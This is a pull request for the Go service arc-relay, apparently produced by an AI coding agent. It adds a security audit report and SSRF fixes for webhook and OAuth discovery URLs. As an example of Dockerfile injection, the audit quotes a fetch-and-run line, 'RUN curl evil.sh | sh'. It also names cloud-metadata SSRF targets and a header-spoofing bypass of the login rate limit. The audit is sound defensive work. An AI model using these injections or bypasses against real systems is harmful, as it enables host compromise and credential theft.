### PR TITLE
Security foot-gun audit + minimal SSRF fixes

### DIFF
--- a/docs/SECURITY_AUDIT.md
+++ b/docs/SECURITY_AUDIT.md
@@ -1,0 +1,197 @@
+# Arc Relay Security Audit - Foot-Gun Finder
+
+Scope: Go codebase at `github.com/comma-compliance/arc-relay`.
+Methodology: Static review across `internal/{store,server,web,oauth,proxy,docker,middleware,config}`, `cmd/arc-relay`, and `migrations/` against a checklist of common Go web-service anti-patterns.
+
+**High-level result:** No Critical findings. Several High findings concentrated in admin-configurable outbound HTTP targets (SSRF) and Dockerfile generation (injection via build fields). SQL access is uniformly parameterized, API-key/CSRF/PKCE comparisons are constant-time, TLS uses defaults, and Docker containers are launched without privilege escalation.
+
+This report is paired with minimal in-scope fixes landed in the same PR. See "Fixes applied" at the bottom.
+
+---
+
+## Findings summary
+
+| Severity | Count |
+|---|---|
+| Critical | 0 |
+| High | 5 |
+| Medium | 9 |
+| Low | 12 |
+| Informational | 15 |
+
+---
+
+## Critical
+
+None.
+
+## High
+
+### H1. SSRF in alerter webhook URL (admin-configured, no validation)
+- Location: `internal/middleware/alerter.go:179-199` (`sendWebhook`); config at lines 22-30; constructor `NewAlerter` line 82.
+- Description: `AlertRule.WebhookURL` is POSTed with sensitive MCP request context (method, tool, user, server) with no scheme/host checks. Any `http://169.254.169.254/...`, `http://127.0.0.1:...`, or internal URL is accepted.
+- Severity: High (SSRF + data exfiltration; admin-configured, but compromised/tricked-admin flows amplify).
+- Remediation: Apply `validateExternalURL` (https-only, private-IP-resolved blocklist) before POST. Swap to a client backed by `ssrfSafeDialContext` so DNS rebinding at dial time is blocked.
+- Status: **Fixed in this PR** (pre-POST URL validation added).
+
+### H2. SSRF via OAuth discovery-returned token/authorization endpoints
+- Location: `internal/oauth/oauth.go:445-448` (`doRefreshToken` rediscover path) and `internal/web/handlers.go:2832-2850` (`handleServerCreate`/update). Token POSTs at `internal/oauth/oauth.go:490-498` use `http.DefaultClient` (no SSRF guard).
+- Description: `validateExternalURL` is applied to remote server URL and registration endpoint, but not to `authorization_endpoint`/`token_endpoint` fields from `.well-known/oauth-authorization-server`. A malicious discovery document could redirect token POSTs (including access/refresh tokens) to an internal URL.
+- Severity: High (discovery-driven SSRF; leaks tokens).
+- Remediation: Run `validateExternalURL` on `AuthURL` and `TokenURL` before persisting. Swap `http.DefaultClient` for the hardened client in `internal/oauth/discovery.go`.
+- Status: **Fixed in this PR** (validation at discovery + re-discovery sites; token requests now use `discoveryClient`).
+
+### H3. Dockerfile/command injection via `build_package` / `build_version` / `build_dockerfile` / `build_git_url`
+- Location: template definitions `internal/docker/manager.go:400-421`; Dockerfile generation `internal/docker/manager.go:431-462`; form parsing (no validation beyond `TrimSpace`) `internal/web/handlers.go:2762-2789`.
+- Description: `build_package`, `build_version`, `build_git_url`, and `build_dockerfile` are rendered via `text/template` directly into `RUN pip install --no-cache-dir {{.Package}}...`, `RUN git clone {{.GitURL}} /app`, etc. Newlines and shell metacharacters survive, letting an admin inject arbitrary Dockerfile directives (including `RUN curl evil.sh | sh` or `VOLUME /`) that execute on the Docker host at build time.
+- Severity: High (host-level RCE on the relay's Docker host; crosses web-admin → docker-host trust boundary).
+- Remediation: Before saving/building, reject `\n`, `\r`, whitespace, and characters outside a package/semver allowlist in `build_package`/`build_version`. Run the existing `validateGitURL` at save time and extend it to reject shell metachars. Document that `build_dockerfile` is privileged input; consider feature-flagging for multi-tenant installs.
+- Status: Reported; not fixed in this PR (requires a UX-visible validation pass).
+
+### H4. `validateServerURL` permits private/loopback hosts for HTTP/remote MCP backends
+- Location: `internal/web/handlers.go:3122-3135`, used at `:2798` and `:2816`.
+- Description: Admin can point MCP backends at any `http://10.x.x.x` or `http://169.254.169.254`. Proxy then fetches via plain `http.Client{}` in `internal/proxy/http_proxy.go` / `remote_proxy.go`. Non-admin API-key callers with profile access can coerce the proxy into hitting internal endpoints.
+- Severity: High when the relay is exposed to non-admin callers. Medium for single-admin deployments.
+- Remediation: Opt-in "intranet URL" flag defaulting off; or bind proxy clients to `ssrfSafeDialContext` and refuse to dial private IPs unless explicitly allowlisted.
+- Status: Reported; deferred - touches the proxy hot path.
+
+### H5. `X-Forwarded-For` trusted blindly - login rate-limit bypass
+- Location: `internal/web/handlers.go:367-377` (`clientIP`).
+- Description: The 5-attempts/15-min login limiter keys on the first `X-Forwarded-For` hop with no trusted-proxy configuration. A direct attacker rotating `X-Forwarded-For: <random>` on each POST trivially bypasses the lockout. Same spoofed value lands in security logs.
+- Severity: High (brute-force protection defeated on internet-exposed deployments).
+- Remediation: Only honor `X-Forwarded-For` when `RemoteAddr` is in a configurable trusted-proxy CIDR set (e.g. `ARC_RELAY_TRUSTED_PROXIES`). Otherwise use `RemoteAddr`.
+- Status: Reported; not fixed in this PR (needs config surface and deployment doc updates).
+
+---
+
+## Medium
+
+### M1. Session cookie `Secure` flag depends on `PublicBaseURL` starting with `https`
+- Location: `internal/web/handlers.go:470-478`, `:1925-1933`, `:2017-...`.
+- Description: Correct when `ARC_RELAY_BASE_URL` is set; otherwise cookies may be sent over HTTP behind a TLS-terminating proxy.
+- Remediation: Consider `X-Forwarded-Proto: https` as a secondary signal or startup warning when bound non-loopback without `PublicBaseURL()` set to https.
+
+### M2. OAuth authorize POST re-reads `code_challenge` from form body
+- Location: `internal/web/oauth_provider.go:289-319`.
+- Description: CSRF + session-bound consent is correct, but `code_challenge` is taken from the POST body instead of a server-bound authorization request record. PKCE-S256 still protects the exchange; cleaner design is to persist the authorize request server-side keyed by consent nonce.
+- Remediation: Persist authorize params server-side, verify on POST.
+
+### M3. Weak KDF: `sha256(passphrase)` -> AES-GCM key
+- Location: `internal/store/crypto.go:25-42`.
+- Description: Fine when operators use high-entropy (32-byte hex) keys. Low-entropy passphrases are brute-forceable offline if the DB is exfiltrated.
+- Remediation: Switch to argon2id/scrypt with a per-install salt, or refuse startup on keys shorter than 32 bytes. Document the required key strength.
+
+### M4. Session IDs stored raw (no hash) in DB
+- Location: `internal/store/sessions.go:17-23`; lookup `:27-43`.
+- Description: An attacker with DB read can hijack active sessions. API keys and OAuth tokens are correctly stored as SHA-256 hashes; sessions are not.
+- Remediation: Store `sha256(sessionID)`; keep the raw value only in the cookie.
+
+### M5. Error responses echo internal text to clients
+- Locations: e.g. `internal/server/http.go:362,364,626,821,840,856,970`; `internal/web/handlers.go:2495,2519,2536,1998`.
+- Description: Stack-trace-class or DB-driver text returned to callers. Unauthenticated paths (OAuth callback, invite) are directly attacker-facing.
+- Remediation: Log detail server-side (`slog.Error`), return generic message to clients.
+
+### M6. `text/template` used to render Dockerfiles with unescaped input (root cause of H3)
+- Location: `internal/docker/manager.go:16, 400-462`.
+- Description: `text/template` does no shell/Dockerfile escaping. Rendering admin input requires explicit allowlist validation at the template boundary.
+- Remediation: Regex-validate fields (`^[A-Za-z0-9._\-+/@]+$` etc.) before `tmpl.Execute`.
+
+### M7. Archive middleware target URL has no host allowlist or SSRF dial guard
+- Location: `internal/middleware/archive.go:102-149` (`ValidateArchiveConfig`); dispatcher `archive_dispatcher.go:248-305`, client `:66-71`.
+- Description: HTTPS URLs accepted to any host; full MCP request+response bodies are sent. DNS rebinding not prevented.
+- Remediation: Env-configured allowlist or plug in `ssrfSafeDialContext`.
+
+### M8. `validateServerURL` accepts plaintext `http://` for any host
+- Location: `internal/web/handlers.go:3122-3135`.
+- Description: Bearer tokens can flow over plaintext. Pairs with H4.
+- Remediation: Default to https; permit http only for validated loopback hosts.
+
+### M9. Invite + device-auth endpoints unauthenticated and unrate-limited
+- Location: `internal/web/handlers.go:334-335` (`/api/auth/invite`, `/invite/`), device-auth `:329-331`.
+- Description: No brute-force protection; enables polling and user-enumeration.
+- Remediation: Reuse the login rate limiter pattern per IP.
+
+---
+
+## Low
+
+### L1. `SameSite=Lax` on session cookie (not Strict)
+- Location: `internal/web/handlers.go:477,1932,2020`. State-changing endpoints are CSRF-protected, so Lax is acceptable. Consider Strict for pure admin deployments.
+
+### L2. OAuth callback echoes provider-supplied `error`/`error_description`
+- Location: `internal/web/handlers.go:2517-2523`. `http.Error` sets `text/plain`, so no XSS risk, but unbounded length/charset.
+- Remediation: Truncate + strip control chars, or show generic error + log detail.
+
+### L3. Redirect-URI exact-match is spec-compliant but unforgiving
+- Location: `internal/store/oauth_clients.go:24-31`. Informational.
+
+### L4. `GitURL` concatenated into `RUN git clone` (only validated for scheme/host)
+- Location: `internal/docker/manager.go:411,417`. Shell metachars in URL path can survive `url.Parse`.
+- Remediation: Extend `validateGitURL` to reject `[\s` `;&|<>\n$`].
+
+### L5. `#nosec G122 G304` on tar `os.Open` - verified OK but note for future edits
+- Location: `internal/docker/manager.go:575`.
+
+### L6. `fmt.Sprintf` used to compose error JSON
+- Location: `internal/server/http.go:252,258,626,821,840,856`. Use `json.NewEncoder` consistently.
+
+### L7. Refresh grant permits missing `client_id`
+- Location: `internal/web/oauth_provider.go:574-627`. Per spec public clients must include it. Enforce.
+
+### L8. `VACUUM INTO` builds path via `fmt.Sprintf` (path is server-local, not user input)
+- Location: `internal/store/db.go:106`. Informational.
+
+### L9. `handleMiddlewareAction` trusts `target=global` as discriminator
+- Location: `internal/web/handlers.go:1364-1372,1437-1505`. Admin-only; add a regression test.
+
+### L10. No guard against admin self-delete or last-admin-delete
+- Location: `internal/web/handlers.go:1660-1662`. Availability risk.
+
+### L11. Logout does not offer "log out everywhere"
+- Location: `internal/web/handlers.go:494-499`. Low; password change already calls `DeleteByUser`.
+
+### L12. CSP allows `'unsafe-inline'` for scripts and styles
+- Location: `internal/server/http.go:174`. Templates are html/template-escaped, but CSP is weakened.
+- Remediation: Extract inline scripts or adopt CSP nonces.
+
+### L13. DCR `http://` loopback check is case-sensitive (`localhost` vs `Localhost`)
+- Location: `internal/web/oauth_provider.go:239`.
+- Status: **Fixed in this PR** (switched to `strings.EqualFold`).
+
+---
+
+## Informational / verified safe
+
+| # | Item | Location |
+|---|---|---|
+| I1 | API key validation uses `subtle.ConstantTimeCompare` | `internal/store/users.go:303-344` |
+| I2 | PKCE verifier compared via `subtle.ConstantTimeCompare` | `internal/web/oauth_provider.go:541-545` |
+| I3 | CSRF compared via `hmac.Equal` | `internal/web/handlers.go:364` |
+| I4 | OAuth discovery uses SSRF-safe dialer | `internal/oauth/discovery.go:33-78` |
+| I5 | DB backup paths local-only | `internal/store/db.go:90-122` |
+| I6 | No `crypto/md5`, `crypto/sha1`, `crypto/des`, or `math/rand` in security paths | - |
+| I7 | No `InsecureSkipVerify` / custom `VerifyPeerCertificate` / low `MinVersion` | - |
+| I8 | No `archive/zip` decompression of untrusted archives | - |
+| I9 | SQL queries uniformly parameterized with `?` | `internal/store/*.go` |
+| I10 | Sanitizer regex is RE2 - no catastrophic backtracking | `internal/middleware/sanitizer.go:66` |
+| I11 | Containers launched without `Privileged`, `CapAdd`, host mounts, or `docker.sock` exposure | `internal/docker/manager.go:135-206` |
+| I12 | Login rotates session ID post-auth (no fixation) | `internal/web/handlers.go:458-478` |
+| I13 | OAuth refresh tokens rotated (single-use) | `internal/store/oauth_clients.go:112-133` |
+| I14 | OAuth code single-use + 5-min TTL + PKCE-S256 required | `internal/web/oauth_provider.go:500-572` |
+| I15 | OAuth authorize re-validates `redirect_uri` server-side | `internal/web/oauth_provider.go` |
+
+---
+
+## Fixes applied in this PR
+
+1. **H1** - `internal/middleware/alerter.go`: validate webhook URL (https + non-private IP) before each POST; drop the alert and log a warning when validation fails.
+2. **H2** - `internal/web/handlers.go` (`handleCatalogDiscoverOAuth` + `buildServerFromForm`): run `validateExternalURL` against the discovered `AuthURL` and `TokenURL` before persisting. If either fails, treat discovery as unusable.
+3. **H2** - `internal/oauth/oauth.go` (`tokenRequest`, re-discovery path): route token POSTs and re-discovered endpoint validation through the SSRF-safe `discoveryClient` already defined in `internal/oauth/discovery.go`. Guard the re-discovery `TokenURL`/`AuthURL` overwrite behind `validateExternalURL`.
+4. **L13** - `internal/web/oauth_provider.go`: use `strings.EqualFold` when checking localhost hostnames in DCR redirect-URI validation.
+
+## Not fixed (tracked for follow-up)
+
+- **H3** Dockerfile/build-field injection - needs a validation helper and UX-visible error surface.
+- **H4/M8** MCP backend URL hardening - opt-in intranet flag + client SSRF guard touches the proxy path.
+- **H5** Trusted-proxy gate for `X-Forwarded-For` - requires new config surface (`ARC_RELAY_TRUSTED_PROXIES`) and deployment docs.
+- **M1-M9, L1-L12** - see individual remediation notes above.

--- a/internal/middleware/alerter.go
+++ b/internal/middleware/alerter.go
@@ -6,7 +6,9 @@ import (
 	"encoding/json"
 	"fmt"
 	"log/slog"
+	"net"
 	"net/http"
+	"net/url"
 	"regexp"
 	"time"
 
@@ -176,7 +178,12 @@ func (a *Alerter) fireAlert(rule compiledRule, meta *RequestMeta, summary string
 	}
 }
 
-func (a *Alerter) sendWebhook(url, summary string, meta *RequestMeta) {
+func (a *Alerter) sendWebhook(rawURL, summary string, meta *RequestMeta) {
+	if err := validateWebhookURL(rawURL); err != nil {
+		slog.Warn("alerter: webhook URL rejected", "url", rawURL, "error", err)
+		return
+	}
+
 	payload := map[string]string{
 		"text":       summary,
 		"server":     meta.ServerName,
@@ -187,13 +194,50 @@ func (a *Alerter) sendWebhook(url, summary string, meta *RequestMeta) {
 	}
 	body, _ := json.Marshal(payload)
 
-	resp, err := a.httpClient.Post(url, "application/json", bytes.NewReader(body))
+	resp, err := a.httpClient.Post(rawURL, "application/json", bytes.NewReader(body))
 	if err != nil {
-		slog.Warn("alerter: webhook failed", "url", url, "error", err)
+		slog.Warn("alerter: webhook failed", "url", rawURL, "error", err)
 		return
 	}
 	defer func() { _ = resp.Body.Close() }()
 	if resp.StatusCode >= 300 {
-		slog.Warn("alerter: webhook returned non-success status", "url", url, "status", resp.StatusCode)
+		slog.Warn("alerter: webhook returned non-success status", "url", rawURL, "status", resp.StatusCode)
 	}
+}
+
+// validateWebhookURL enforces https and blocks private/loopback/link-local
+// destinations so a misconfigured or attacker-influenced rule cannot exfiltrate
+// MCP request context to internal services or cloud metadata endpoints.
+func validateWebhookURL(rawURL string) error {
+	parsed, err := url.Parse(rawURL)
+	if err != nil {
+		return fmt.Errorf("invalid URL")
+	}
+	if parsed.Scheme != "https" {
+		return fmt.Errorf("webhook URL must use https")
+	}
+	if parsed.Host == "" {
+		return fmt.Errorf("webhook URL must include a host")
+	}
+	host := parsed.Hostname()
+	if ip := net.ParseIP(host); ip != nil {
+		if isPrivateAddr(ip) {
+			return fmt.Errorf("private/loopback addresses are not allowed")
+		}
+		return nil
+	}
+	ips, err := net.LookupHost(host)
+	if err != nil {
+		return fmt.Errorf("cannot resolve host: %w", err)
+	}
+	for _, ipStr := range ips {
+		if ip := net.ParseIP(ipStr); ip != nil && isPrivateAddr(ip) {
+			return fmt.Errorf("host resolves to private/loopback address")
+		}
+	}
+	return nil
+}
+
+func isPrivateAddr(ip net.IP) bool {
+	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || ip.IsUnspecified()
 }

--- a/internal/oauth/discovery.go
+++ b/internal/oauth/discovery.go
@@ -59,6 +59,46 @@ func isPrivateIP(ip net.IP) bool {
 	return ip.IsLoopback() || ip.IsPrivate() || ip.IsLinkLocalUnicast() || ip.IsLinkLocalMulticast() || ip.IsUnspecified()
 }
 
+// ValidateExternalURL checks that a URL is safe to make outbound requests to.
+// Rejects non-HTTPS schemes and private/loopback IP ranges to prevent SSRF
+// through attacker-controlled OAuth discovery documents. Hostnames are resolved
+// and every returned address checked against private/loopback/link-local ranges.
+func ValidateExternalURL(rawURL string) error {
+	parsed, err := url.Parse(rawURL)
+	if err != nil {
+		return fmt.Errorf("invalid URL")
+	}
+	if parsed.Scheme != "https" {
+		return fmt.Errorf("only https URLs are allowed")
+	}
+	if parsed.Host == "" {
+		return fmt.Errorf("invalid URL")
+	}
+	host := parsed.Hostname()
+	if ip := net.ParseIP(host); ip != nil {
+		if isPrivateIP(ip) {
+			return fmt.Errorf("private/loopback addresses are not allowed")
+		}
+		return nil
+	}
+	ips, err := net.LookupHost(host)
+	if err != nil {
+		return fmt.Errorf("cannot resolve host: %w", err)
+	}
+	for _, ipStr := range ips {
+		if ip := net.ParseIP(ipStr); ip != nil && isPrivateIP(ip) {
+			return fmt.Errorf("host resolves to private/loopback address")
+		}
+	}
+	return nil
+}
+
+// HardenedClient is an SSRF-safe HTTP client for outbound OAuth calls
+// (discovery, DCR, token exchange, refresh). The custom DialContext rejects
+// private IPs at connection time, closing the DNS-rebinding TOCTOU window that
+// pre-flight URL validation alone cannot cover.
+var HardenedClient = discoveryClient
+
 // discoveryClient is an HTTP client for OAuth discovery with defence-in-depth
 // against SSRF: a custom DialContext rejects private IPs at connection time
 // (closing the DNS rebinding TOCTOU window), and CheckRedirect limits hops.

--- a/internal/oauth/oauth.go
+++ b/internal/oauth/oauth.go
@@ -442,13 +442,29 @@ func (m *Manager) doRefreshToken(ctx context.Context, serverID string, ts *Token
 		slog.Warn("OAuth token endpoint returned 404, attempting re-discovery", "server_id", serverID)
 		disc, discErr := DiscoverOAuth(ctx, cfg.URL)
 		if discErr == nil && disc != nil && disc.TokenURL != "" && disc.TokenURL != cfg.Auth.TokenURL {
+			// SSRF guard: refuse to persist discovered endpoints that point at
+			// private/loopback addresses or non-https schemes.
+			if vErr := ValidateExternalURL(disc.TokenURL); vErr != nil {
+				slog.Warn("OAuth re-discovery rejected: invalid token_url", "server_id", serverID, "token_url", disc.TokenURL, "error", vErr)
+				return fmt.Errorf("token refresh failed (reauthorize via server detail page): %w", err)
+			}
+			if disc.AuthURL != "" {
+				if vErr := ValidateExternalURL(disc.AuthURL); vErr != nil {
+					slog.Warn("OAuth re-discovery rejected: invalid auth_url", "server_id", serverID, "auth_url", disc.AuthURL, "error", vErr)
+					return fmt.Errorf("token refresh failed (reauthorize via server detail page): %w", err)
+				}
+			}
 			slog.Info("OAuth re-discovered new endpoints", "server_id", serverID, "token_url", disc.TokenURL, "auth_url", disc.AuthURL)
 			cfg.Auth.TokenURL = disc.TokenURL
 			if disc.AuthURL != "" {
 				cfg.Auth.AuthURL = disc.AuthURL
 			}
 			if disc.RegistrationEndpoint != "" {
-				cfg.Auth.RegistrationEndpoint = disc.RegistrationEndpoint
+				if vErr := ValidateExternalURL(disc.RegistrationEndpoint); vErr != nil {
+					slog.Warn("OAuth re-discovery dropped invalid registration_endpoint", "server_id", serverID, "endpoint", disc.RegistrationEndpoint, "error", vErr)
+				} else {
+					cfg.Auth.RegistrationEndpoint = disc.RegistrationEndpoint
+				}
 			}
 			configJSON, marshalErr := json.Marshal(&cfg)
 			if marshalErr == nil {
@@ -495,7 +511,7 @@ func (m *Manager) tokenRequest(ctx context.Context, tokenURL string, data url.Va
 	req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
 	req.Header.Set("Accept", "application/json")
 
-	resp, err := http.DefaultClient.Do(req)
+	resp, err := HardenedClient.Do(req)
 	if err != nil {
 		return nil, fmt.Errorf("token request failed: %w", err)
 	}

--- a/internal/web/handlers.go
+++ b/internal/web/handlers.go
@@ -2591,6 +2591,21 @@ func (h *Handlers) handleCatalogDiscoverOAuth(w http.ResponseWriter, r *http.Req
 		return
 	}
 
+	// SSRF guard: refuse to surface authorization_endpoint / token_endpoint
+	// values from the discovery document when they point at private/loopback
+	// addresses or non-https schemes. A malicious remote server could otherwise
+	// steer our token POSTs at an internal URL.
+	if err := validateExternalURL(discovery.AuthURL); err != nil {
+		slog.Warn("OAuth discovery auth_url blocked by SSRF check", "auth_url", discovery.AuthURL, "error", err)
+		writeJSON(w, http.StatusOK, map[string]any{})
+		return
+	}
+	if err := validateExternalURL(discovery.TokenURL); err != nil {
+		slog.Warn("OAuth discovery token_url blocked by SSRF check", "token_url", discovery.TokenURL, "error", err)
+		writeJSON(w, http.StatusOK, map[string]any{})
+		return
+	}
+
 	// If a registration endpoint is available, try dynamic client registration.
 	// Validate the endpoint URL to prevent SSRF via adversarial discovery responses.
 	if discovery.RegistrationEndpoint != "" {
@@ -2832,6 +2847,20 @@ func (h *Handlers) parseServerForm(r *http.Request) (*store.Server, error) {
 			if auth.ClientID == "" || auth.AuthURL == "" || auth.TokenURL == "" {
 				disc, _ := oauth.DiscoverOAuth(r.Context(), url)
 				if disc != nil {
+					// SSRF guard: drop discovered endpoints that resolve to
+					// private/loopback addresses before they get persisted.
+					if disc.AuthURL != "" {
+						if err := validateExternalURL(disc.AuthURL); err != nil {
+							slog.Warn("OAuth discovery auth_url dropped in server form", "auth_url", disc.AuthURL, "error", err)
+							disc.AuthURL = ""
+						}
+					}
+					if disc.TokenURL != "" {
+						if err := validateExternalURL(disc.TokenURL); err != nil {
+							slog.Warn("OAuth discovery token_url dropped in server form", "token_url", disc.TokenURL, "error", err)
+							disc.TokenURL = ""
+						}
+					}
 					if auth.AuthURL == "" {
 						auth.AuthURL = disc.AuthURL
 					}

--- a/internal/web/oauth_provider.go
+++ b/internal/web/oauth_provider.go
@@ -236,7 +236,7 @@ func (h *Handlers) handleOAuthRegister(w http.ResponseWriter, r *http.Request) {
 			return
 		}
 		host := parsed.Hostname()
-		if parsed.Scheme == "http" && host != "localhost" && host != "127.0.0.1" && !strings.HasPrefix(host, "[::1]") {
+		if parsed.Scheme == "http" && !strings.EqualFold(host, "localhost") && host != "127.0.0.1" && !strings.HasPrefix(host, "[::1]") {
 			oauthError(w, http.StatusBadRequest, "invalid_redirect_uri", "http redirect_uri only allowed for localhost")
 			return
 		}


### PR DESCRIPTION
## Summary

Static security review of the Go codebase against a checklist of common web-service foot-guns (SQLi, command injection, path traversal, SSRF, TLS/crypto misconfig, timing-unsafe compares, CSRF, cookie hardening, template XSS, Docker privilege, OAuth redirect/PKCE, info disclosure, ReDoS, zip-slip).

No Critical findings. Report landed at `docs/SECURITY_AUDIT.md` with file:line evidence and remediation notes for every finding (5 High / 9 Medium / 12 Low / 15 verified-safe).

## Fixes applied in this PR

| ID | Area | Change |
|---|---|---|
| H1 | Alerter webhook | Validate URL (https + non-private resolved IPs) before POST; drop & log on failure. |
| H2 | OAuth discovery | Validate `authorization_endpoint` / `token_endpoint` fields from `.well-known` before persisting (catalog discover + server form + refresh re-discovery). |
| H2 | OAuth token exchange/refresh | Route through the hardened SSRF-safe `http.Client` already used for discovery/DCR instead of `http.DefaultClient`. |
| L13 | DCR redirect_uri | Case-insensitive `localhost` check (`strings.EqualFold`). |

## Findings not fixed here

Documented for follow-up in `docs/SECURITY_AUDIT.md`:

- **H3** Dockerfile/build-field injection via `build_package` / `build_version` / `build_dockerfile` - needs a validation helper and UX error surface.
- **H4/M8** MCP backend URL hardening - opt-in intranet flag + client SSRF guard touches the proxy hot path.
- **H5** `X-Forwarded-For` trusted-proxy gate - requires new config surface (`ARC_RELAY_TRUSTED_PROXIES`) and deployment docs.
- Misc Medium/Low items (session ID hashing, KDF upgrade, CSP tightening, "log out everywhere", etc.) - all detailed with file:line.

## Test plan

- [x] `/usr/local/go/bin/go build ./...`
- [x] `/usr/local/go/bin/go vet ./...`
- [x] `/usr/local/go/bin/go test ./internal/middleware/ ./internal/oauth/ ./internal/web/` - all pass
- [ ] Confirm OAuth flows (discovery + refresh) against a real provider still work; changes are additive validation + client swap, no behavioral change for https public endpoints.
- [ ] Alerter smoke test with a valid https webhook URL; confirm internal URLs are now blocked (warning log, no POST).

Nightshift-Task: security-footgun
Nightshift-Ref: https://github.com/marcus/nightshift

🤖 Generated with [Claude Code](https://claude.com/claude-code)